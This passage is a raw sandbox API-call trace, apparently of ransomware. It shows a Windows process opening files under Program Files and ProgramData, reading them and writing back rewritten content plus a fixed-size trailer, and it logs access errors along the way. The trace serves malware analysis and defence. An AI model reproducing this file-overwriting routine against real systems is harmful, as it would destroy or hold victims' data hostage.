lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x28880e8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0154.875] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1ba70 [0154.875] ReadFile (in: hFile=0x204, lpBuffer=0x28880e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x28880e8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0154.907] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1ba70 [0154.907] WriteFile (in: hFile=0x204, lpBuffer=0x288b148*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288b148*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0154.907] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0154.907] WriteFile (in: hFile=0x204, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0154.908] CloseHandle (hObject=0x204) returned 1 [0154.908] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0154.919] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0154.919] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1d270 [0154.919] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0154.919] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.920] ReleaseMutex (hMutex=0x168) returned 1 [0154.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="maintenanceservice.exe", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0154.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="maintenanceservice.exe", cchWideChar=22, lpMultiByteStr=0x1f88d34, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="maintenanceservice.exe", lpUsedDefaultChar=0x0) returned 22 [0154.920] ReadFile (in: hFile=0x1d4, lpBuffer=0x2897aa8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2897aa8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0155.020] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c270 [0155.020] ReadFile (in: hFile=0x1d4, lpBuffer=0x2891978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2891978*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.097] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c270 [0155.097] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.097] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0155.097] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0155.097] CloseHandle (hObject=0x1d4) returned 1 [0155.098] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\precomplete" (normalized: "c:\\program files (x86)\\mozilla firefox\\precomplete"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0155.099] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0155.099] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7e3 [0155.099] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0155.099] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.099] ReleaseMutex (hMutex=0x168) returned 1 [0155.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="precomplete", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0155.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="precomplete", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="precomplete", lpUsedDefaultChar=0x0) returned 11 [0155.100] ReadFile (in: hFile=0x1d4, lpBuffer=0x2897ac8, nNumberOfBytesToRead=0x7e3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2897ac8*, lpNumberOfBytesRead=0x2d5f2bc*=0x7e3, lpOverlapped=0x0) returned 1 [0155.121] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0155.121] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xd6b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2d5f2d0*=0xd6b, lpOverlapped=0x0) returned 1 [0155.121] CloseHandle (hObject=0x1d4) returned 1 [0155.132] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapp-uninstaller.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapp-uninstaller.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0155.143] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0155.143] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x29bd0 [0155.143] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0155.143] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.143] ReleaseMutex (hMutex=0x168) returned 1 [0155.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="webapp-uninstaller.exe", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0155.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="webapp-uninstaller.exe", cchWideChar=22, lpMultiByteStr=0x1f88c44, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webapp-uninstaller.exe", lpUsedDefaultChar=0x0) returned 22 [0155.144] ReadFile (in: hFile=0x204, lpBuffer=0x28810e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x28810e8*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0155.161] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x28bd0 [0155.161] ReadFile (in: hFile=0x204, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.220] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x28bd0 [0155.221] WriteFile (in: hFile=0x204, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.221] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0155.221] WriteFile (in: hFile=0x204, lpBuffer=0x28de2a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28de2a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0155.222] CloseHandle (hObject=0x204) returned 1 [0155.222] CreateFileW (lpFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0155.224] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0155.225] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1276 [0155.225] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0155.225] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.225] ReleaseMutex (hMutex=0x168) returned 1 [0155.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Workflow.Targets", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0155.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Workflow.Targets", cchWideChar=16, lpMultiByteStr=0x1f88bcc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Workflow.Targets", lpUsedDefaultChar=0x0) returned 16 [0155.225] ReadFile (in: hFile=0x204, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1276, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2d5f2bc*=0x1276, lpOverlapped=0x0) returned 1 [0155.234] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0155.234] WriteFile (in: hFile=0x204, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x17fe, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2d5f2d0*=0x17fe, lpOverlapped=0x0) returned 1 [0155.234] CloseHandle (hObject=0x204) returned 1 [0155.234] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\msoeres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0155.235] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui", lpFilePart=0x2d5f690*="msoeres.dll.mui") returned 0x39 [0155.235] GetLastError () returned 0x5 [0155.235] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0155.235] LocalFree (hMem=0x69e2b0) returned 0x0 [0155.235] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0155.235] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0155.235] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0155.236] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0155.236] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\msoeres.dll.mui")) returned 0x20 [0155.236] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\flowers-anytime-pollution.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\flowers-anytime-pollution.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0155.236] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\flowers-anytime-pollution.exe", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Photo Viewer\\flowers-anytime-pollution.exe", lpFilePart=0x2d5f690*="flowers-anytime-pollution.exe") returned 0x49 [0155.237] GetLastError () returned 0x20 [0155.237] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x51 [0155.237] LocalFree (hMem=0x69e018) returned 0x0 [0155.237] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0155.237] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0155.237] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0155.238] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0155.238] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\flowers-anytime-pollution.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\flowers-anytime-pollution.exe")) returned 0x20 [0155.238] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0155.239] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0155.239] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1df [0155.240] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0155.240] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.240] ReleaseMutex (hMutex=0x168) returned 1 [0155.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="directories.acrodata", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0155.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="directories.acrodata", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="directories.acrodata", lpUsedDefaultChar=0x0) returned 20 [0155.240] ReadFile (in: hFile=0x204, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1df, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2d5f2bc*=0x1df, lpOverlapped=0x0) returned 1 [0155.241] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0155.242] WriteFile (in: hFile=0x204, lpBuffer=0x2881108*, nNumberOfBytesToWrite=0x767, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2881108*, lpNumberOfBytesWritten=0x2d5f2d0*=0x767, lpOverlapped=0x0) returned 1 [0155.242] CloseHandle (hObject=0x204) returned 1 [0155.242] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0161.752] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.752] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x14c [0161.752] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.753] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.753] ReleaseMutex (hMutex=0x168) returned 1 [0161.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GROOVE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0161.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GROOVE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x1f88d34, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.GROOVE.14.1033.hxn", lpUsedDefaultChar=0x0) returned 21 [0161.753] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ab48, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ab48*, lpNumberOfBytesRead=0x2d5f2bc*=0x14c, lpOverlapped=0x0) returned 1 [0161.755] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0161.755] WriteFile (in: hFile=0x1e4, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6d4, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6d4, lpOverlapped=0x0) returned 1 [0161.755] CloseHandle (hObject=0x1e4) returned 1 [0161.757] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0161.758] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.758] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x14c [0161.758] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.758] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.759] ReleaseMutex (hMutex=0x168) returned 1 [0161.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSTORE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0161.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSTORE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x1f88d34, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSTORE.14.1033.hxn", lpUsedDefaultChar=0x0) returned 21 [0161.759] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ab48, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ab48*, lpNumberOfBytesRead=0x2d5f2bc*=0x14c, lpOverlapped=0x0) returned 1 [0161.760] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0161.760] WriteFile (in: hFile=0x1e4, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6d4, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6d4, lpOverlapped=0x0) returned 1 [0161.761] CloseHandle (hObject=0x1e4) returned 1 [0161.761] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0161.762] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.762] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x146 [0161.762] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0161.763] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.763] ReleaseMutex (hMutex=0x168) returned 1 [0161.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0161.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1f88d34, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0161.763] ReadFile (in: hFile=0x1e4, lpBuffer=0x288ab48, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ab48*, lpNumberOfBytesRead=0x2d5f2bc*=0x146, lpOverlapped=0x0) returned 1 [0161.764] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0161.764] WriteFile 